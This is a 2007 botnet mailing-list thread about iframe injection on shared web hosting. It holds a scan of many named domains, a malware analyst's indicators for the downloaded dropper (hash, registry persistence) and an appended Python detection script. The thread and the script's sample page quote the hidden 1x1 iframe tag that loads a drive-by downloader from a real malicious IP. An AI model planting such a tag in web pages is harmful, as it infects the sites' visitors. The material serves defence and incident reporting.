To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
William,

Another thought would be to block the IP where these iframes point to...

From the first javascript on the page of them all...

"iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter"

The 81 IP is a Russian host that has a long history in hosting malware and viruses. Anyhow, the "index.html" is actually a VBscript that downloads a file (work.exe) using a specific CLSID and ADODB to... "TMP" directory on the victim. Not sure yet where it's stored on the victim OS. This file, which seems to be partially detected by the AV market, has these characteristics:

MD5: ed479b8ea0ce903052be3be8b401bac4
Size: 27K (27678 bytes)
Packed: Yes
Packer: WinUpack 0.39

Quick Analysis:

File System Changes/Mods/Additions/Deletions
------------------------
Copies itself to "C:\Documents and Settings\<victim account>\xx_<4_random_lowercase_letters>.exe"

Registry Changes
-----------------------
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"xx_Shell="C:\Documents and Settings\<Victim>\xx_<4_random_lowercase_letters>.exe"

Network Connections
-----------------
- None noted

----

Until I can rip the packer off I can't easily look through the rest of the binary.

Hope that helps,
Jake Babbin

inetnum:        81.95.144.0 - 81.95.147.255
netname:        RBNET
descr:          Russian Business Network
admin-c:        RBNR-ORG
tech-c:         RBNR-ORG
mnt-by:         RBN-MNT
status:         ASSIGNED PA
country:        RU
remarks:        INFRA-AW
source:         RIPE # Filtered

role:           Russian Business Network Registry
address:        Russian Business Network
address:        12 Levashovskiy pr.
address:        197110 Saint-Petersburg
address:        Russia
remarks:        Points of contact for RBN Network Operations
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues: [EMAIL PROTECTED]
remarks:        SPAM and Network security issues: [EMAIL PROTECTED]
remarks:        Customer support: [EMAIL PROTECTED]
remarks:        General information: [EMAIL PROTECTED]
remarks:        ------------------------------------------------------
admin-c:        ON316-RIPE
admin-c:        NI212-RIPE
tech-c:         MZ2231-RIPE
tech-c:         NI212-RIPE
nic-hdl:        RBNR-ORG
mnt-by:         RBN-MNT
source:         RIPE # Filtered
abuse-mailbox:  [EMAIL PROTECTED]

% Information related to '81.95.144.0/20AS40989'
route:          81.95.144.0/20
descr:          TcS Network
origin:         AS40989
mnt-by:         RBN-MNT
source:         RIPE # Filtered

On 1/21/07, William Atchison <[EMAIL PROTECTED]> wrote:
If you ever wondered how botnets keep growing, not like it's a big mystery, the host iPowerWeb has many servers that are just filthy with infected sites waiting to exploit any unprotected browser.

I stumbled across the problem because people visiting one of my sites were complaining that links to sites on iPowerWeb servers were tripping their anti-virus software. When I complained to iPowerWeb about the handful of sites I initially knew about, they just cleaned the index pages on those domains and left the rest of the server messed up. They tell their customers that find this problem to change their FTP passwords, what a joke.

PCWORLD printed an article "Net Watchdog: Hacked Site Causes Headaches" that is almost 7 months old describing the exact same issues with this very same host, so this is nothing new; they've known about it for quite some time, yet it persists.

http://www.pcworld.com/printable/article/id,126508/printable.html

I quickly found about 12 infected servers, so I wrote a script to scan the domains on one shared server just to see how bad the problem was per server. See for yourself the example from a single server:

WARNING: disable javascript before visiting these domains

IFRAME INJECTOR SCRIPT report for server: 66.235.217.112

accessplans.com ... INFECTED
ace-designz.com ... INFECTED
aerostamps.com ... INFECTED
airstream-bohemia.com ... INFECTED
aislesay.com ... OK
ajsupply.net ... INFECTED
akarocks.com ... INFECTED
alair.com ... OK
alloccasion.com ... OK
alterthespians.com ... OK
ameriservplumbing.com ... OK
andrexconsulting.com ... INFECTED
anthonywayneasse.org ... INFECTED
antiguaculture.com ... OK
argyle-weekend.org ... OK
arkasizer.com ... INFECTED
artsplosion.com ... OK
ashlerlodge.org ... INFECTED
asia-resources.com ... INFECTED
atvmaine.net ... OK
auraya.com ... OK
avalonandalusians.com ... OK
baker-offshore.com ... OK
ben-sinai.com ... INFECTED
benyo.com ... OK
berryranch.net ... INFECTED
bigbendyoga.com ... OK
bistrocatering.com ... INFECTED
bluekey.org ... INFECTED
boogietek.com ... OK
bootlegtrading.net ... OK
bottomtime.net ... INFECTED
brriverbats.com ... OK
bruceellman.com ... INFECTED
bsplaborlaw.com ... OK
bullpencatcher.com ... OK
cafeiris.com ... OK
camouflageracing.com ... OK
canddsolutions.com ... OK
capitalweekend.org ... OK
cashmarkmedia.com ... OK
catsoriginalbooktales.com ... OK
cccntr.com ... OK
cdgenealogy.net ... OK
centralsupplyco.biz ... INFECTED
chefjuke.com ... OK
cobonline.org ... OK
codeinc.org ... OK
composite-sourcing.com ... OK
confusionism.com ... OK
considerballoons.com ... INFECTED
coretesting.net ... INFECTED
countrysquirecleaners.com ... INFECTED
criticalillnessinsuranceservices.com ... INFECTED
crs-us.com ... INFECTED
davidakinministry.org ... OK
demadiur.com ... OK
design-by-klein.com ... INFECTED
designbenedictusa.com ... INFECTED
diannadunn.com ... OK
digi-magine.net ... INFECTED
djmikeandrew.com ... INFECTED
dlbrown.com ... INFECTED
donjusticecabinetmakers.com ... OK
drlandis.com ... OK
dungeonhawaii.com ... OK
durhamcuisine.com ... OK
e-biz-resource-center.com ... OK
efilefinancial.com ... OK
egcollins.com ... INFECTED
emediez.com ... OK
english-vip.com ... INFECTED
eyecandy-gallery.com ... OK
family2family.net ... OK
fbckh.com ... OK
federalleague.com ... OK
fjexpeditions.com ... OK
flattrackmac.com ... OK
floramedica.com ... INFECTED
floridabestvalue.com ... INFECTED
floweringtreesociety.org ... INFECTED
focusenglish.com ... INFECTED
forchuteckconsulting.com ... OK
fourstorydesign.com ... OK
fraud-forgery.com ... INFECTED
freestonestudio.com ... OK
fssequipment.com ... OK
gavinstudio.com ... OK
gilroyrangeriders.com ... OK
ginascipione.com ... OK
graphics-by-gunslinger.com ... OK
greendaleentertainment.com ... OK
h-arts.net ... OK
harrygamboajr.com ... OK
hawaiiraves.com ... OK
hbsaai.org ... OK
hearninsurance.com ... OK
heartwoodseniorliving.com ... OK
hellenicbar.org ... INFECTED
hiddenrest.com ... OK
holden-tech.com ... OK
holovisions.net ... INFECTED
holyrosaryduryea.com ... OK
homeanddoor.com ... OK
houghtonlake.us ... OK
humbertogarza.com ... OK
ideationdesigns.com ... INFECTED
ilusaw.com ... INFECTED
imt.us ... INFECTED
indahbulan.com ... OK
indyoffice.net ... INFECTED
indyoptics.com ... INFECTED
inhiswill.org ... OK
ipdistributors.com ... INFECTED
itconsulting-ga.com ... INFECTED
ivyleafschools.org ... OK
jackiepock.com ... OK
jamesness.com ... OK
jason-abbott.com ... OK
jasonabbott.com ... OK
jds-inc.com ... INFECTED
jedifiction.com ... OK
jefko.com ... INFECTED
jnjcars.com ... INFECTED
joelbissonnette.com ... OK
johndenvertribute.com ... OK
josephbrewster.com ... INFECTED
jrcai.com ... INFECTED
jumparoundrentals.com ... INFECTED
jvguitars.com ... OK
kckgraphics.com ... INFECTED
kinshipkennel.com ... INFECTED
langansloft.com ... INFECTED
lanwrx.com ... OK
laptoptek.com ... OK
lighthousephotorepair.com ... OK
littlebirch.com ... INFECTED
liz-weber.com ... OK
lonebrushman.com ... OK
lorryannphoto.com ... OK
lostcreektech.com ... OK
loughrynn.net ... OK
malevichsociety.org ... INFECTED
manuind.com ... INFECTED
massageamerica.us ... INFECTED
matlogix.com ... INFECTED
mcgirlscouts.org ... OK
mckeesportsharks.com ... OK
meluso.com ... INFECTED
milieu-design.com ... OK
mindtech-group.com ... INFECTED
moonlightindustries.com ... OK
moopigface.com ... OK
msbishop.com ... INFECTED
multipol.com ... INFECTED
muzuya.com ... INFECTED
myrtlebeachexperience.com ... OK
mysterypr.com ... INFECTED
mysticalstar.com ... OK
mysticplayers.org ... OK
neiroukh.org ... OK
nygroup.com ... OK
onekaonline.com ... INFECTED
ontopofacloud.com ... INFECTED
operationsnehemiah.org ... OK
opfes.com ... OK
oxboro.org ... OK
pack22.org ... OK
paintmeaportrait.com ... OK
paulamartin.com ... OK
peacewithmusic.org ... OK
portlandfiremuseum.com ... OK
precisionfleetservices.com ... INFECTED
principalmentor.com ... INFECTED
process-evolution.com ... INFECTED
pscsafe.com ... INFECTED
psychoward.com ... INFECTED
purseparadise.com ... OK
ratwilder.com ... OK
realfood4dogs.com ... INFECTED
rememberwhenflowersandgifts.com ... INFECTED
rent2you.com ... OK
rermotorsports.com ... OK
rernetworking.com ... OK
revelationcafe.com ... OK
rgchurch.org ... OK
rgcm.org ... INFECTED
robertvanderhorst.com ... OK
robocap.net ... OK
rotorspins.com ... OK
roundvalley83.com ... INFECTED
rsahawaii.com ... OK
rscds-greaterdc.org ... OK
saccityweb.com ... INFECTED
safeandsoundsitters.com ... OK
sail1620.org ... OK
sandrarussell.com ... INFECTED
sanfranciscogymnastics.com ... INFECTED
savethelemur.org ... INFECTED
schwimmersenterprises.com ... OK
sempiternalproductions.com ... INFECTED
sfangels.com ... OK
sight-sound-djs.com ... INFECTED
signmaxcsg.com ... INFECTED
siloambio.com ... OK
sjtosa.org ... OK
socalrealtyclub.com ... OK
soccercommercials.com ... OK
soundbitten.com ... OK
southtownpits.com ... OK
speedrailltd.com ... OK
ssmn-e.com ... INFECTED
standardwebsolutions.com ... OK
steventorres.com ... INFECTED
sthphoto.com ... INFECTED
stuartlea.com ... INFECTED
studygroupinc.org ... OK
successcoach.net ... INFECTED
summerwindimporters.com ... OK
sunsetglamour.com ... OK
superiorlures.com ... OK
suzysikora.com ... INFECTED
swnight.com ... OK
syafootball.org ... OK
sycamorecreekranch.com ... INFECTED
systemheating.com ... INFECTED
tacoutdoors.net ... INFECTED
tactechnology.com ... INFECTED
tcm-training.com ... INFECTED
tempmakers.com ... OK
tewahdo.com ... INFECTED
thecoper.com ... OK
thequiltdepot.com ... OK
therothfamily.net ... INFECTED
thethemeroom.com ... OK
timetodare.com ... OK
timstewart.com ... INFECTED
tokyophysio.com ... INFECTED
totalenergyonline.com ... INFECTED
tradewindrealty.com ... OK
trichurch.com ... INFECTED
tridentmartialsystems.com ... OK
trilliumdesigngroup.com ... INFECTED
tropicalgardenfurniture.com ... INFECTED
troublecreek.com ... INFECTED
turnkeytechnology.net ... OK
tychiosleather.com ... OK
unidosporcolombia.com ... OK
usa-hapkido.com ... OK
valleroy.net ... INFECTED
velozphotography.com ... OK
visionweddingveils.com ... INFECTED
waterpistolmusic.com ... OK
waterwonderlandchorus.org ... OK
wcd3dwebdesign.com ... INFECTED
webdesignforsoho.com ... OK
webuyhousescash.com ... INFECTED
westonhurt.com ... OK
whisperingalley.com ... OK
whitebluffmga.com ... INFECTED
winsoftly.com ... INFECTED
woodfloor.com ... INFECTED
wowdates.com ... OK
wutancanada.com ... INFECTED
wuurld.org ... OK
yahrzeit.org ... INFECTED
yamasato.com ... INFECTED

--
Bill Atchison
http://www.crawlwall.com

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
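The two checks a defender would want from this thread, written out as an added example (this is not William's scanning script, which he did not post, nor Jake's analysis tooling): a page scanner that flags the hidden 1x1 iframe quoted above, including when it is emitted from inside a JavaScript string, and a host-side check that matches Run-key values and a file hash against the indicators Jake listed (the xx_Shell value name, the xx_<4 letters>.exe path pattern, the MD5). The HTML pages and registry values below are constructed samples; the injector host, hash and persistence pattern are the ones on the page.

```python
"""Defender-side checks for the iframe-injection / dropper case in this thread.
Added example, not code from the thread's authors. Sample pages and Run-key
values are constructed; the indicators come from the thread itself."""
import hashlib
import re
from urllib.parse import urlparse

# Indicators taken from the thread (Jake Babbin's quick analysis).
KNOWN_DROPPER_MD5 = "ed479b8ea0ce903052be3be8b401bac4"
KNOWN_IFRAME_HOST = "81.95.146.98"
DROPPER_NAME_RE = re.compile(r"\\xx_[a-z]{4}\.exe$", re.I)   # ...\xx_abcd.exe

IFRAME_TAG_RE = re.compile(r"<\s*iframe\b([^>]*)>", re.I)
# name=value with double-quoted, single-quoted or bare values; the injected tag
# quoted in the thread uses a bare, unquoted src.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def _attrs(raw: str) -> dict:
    """Parse an iframe tag's attribute string into a lower-cased dict."""
    out = {}
    for m in ATTR_RE.finditer(raw):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def _tiny(value) -> bool:
    """True for a width/height of 1px or less (missing or % values are not tiny)."""
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html: str) -> list:
    """One finding per iframe that looks like an injected loader.

    A regex is used instead of an HTML parser on purpose: the iframe in the
    thread is written by the page's first <script>, so it only exists inside a
    JavaScript string literal, where a DOM parser would not see it."""
    findings = []
    for m in IFRAME_TAG_RE.finditer(html):
        a = _attrs(m.group(1))
        src = a.get("src", "")
        host = urlparse(src if "://" in src else "http://" + src).hostname or ""
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 frame")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if IPV4_RE.match(host):
            reasons.append("src is a bare IP")
        if host == KNOWN_IFRAME_HOST:
            reasons.append("known injector host")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


def scan_pages(pages: dict) -> dict:
    """Map domain -> 'INFECTED' / 'OK', the shape of the report in the thread."""
    return {d: ("INFECTED" if find_suspicious_iframes(h) else "OK")
            for d, h in pages.items()}


def check_run_values(values: dict) -> list:
    """Flag HKLM\\...\\Run entries matching the dropper's persistence pattern."""
    hits = []
    for name, cmd in values.items():
        if name.lower() == "xx_shell" or DROPPER_NAME_RE.search(cmd.strip('"')):
            hits.append((name, cmd))
    return hits


def is_known_dropper(data: bytes) -> bool:
    """Compare a file's MD5 with the sample hash from the thread."""
    return hashlib.md5(data).hexdigest() == KNOWN_DROPPER_MD5


# Constructed samples: one page carrying the injected tag via document.write,
# one clean page with an ordinary embed, and two Run-key values.
SAMPLE_INFECTED = (
    "<html><body><h1>Welcome</h1>\n"
    "<script>document.write('<iframe src= http://81.95.146.98/index.html "
    "frameborder=\"0\" width=\"1\" height=\"1\" scrolling=\"no\" name=counter>"
    "</iframe>')</script></body></html>"
)
SAMPLE_CLEAN = ('<html><body><iframe src="https://example.com/embed" '
                'width="600" height="400"></iframe></body></html>')
SAMPLE_RUN_VALUES = {
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    "xx_Shell": r'"C:\Documents and Settings\alice\xx_kqzt.exe"',
}

if __name__ == "__main__":
    for domain, status in scan_pages({"a.example": SAMPLE_INFECTED,
                                      "b.example": SAMPLE_CLEAN}).items():
        print(f"{domain} ... {status}")
    for finding in find_suspicious_iframes(SAMPLE_INFECTED):
        print("  ", finding["src"], ", ".join(finding["reasons"]))
    print("Run-key hits:", check_run_values(SAMPLE_RUN_VALUES))
```

The page scanner reports why it flagged a frame rather than just a verdict, so a hosting admin cleaning a shared server can tell a known-bad loader from a merely odd embed; the bare-IP and 1x1 heuristics will also catch the same injector after it moves to a different address, which a plain string match on 81.95.146.98 would not. The Run-key check keys on both the value name and the path pattern because either may survive a partial cleanup.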
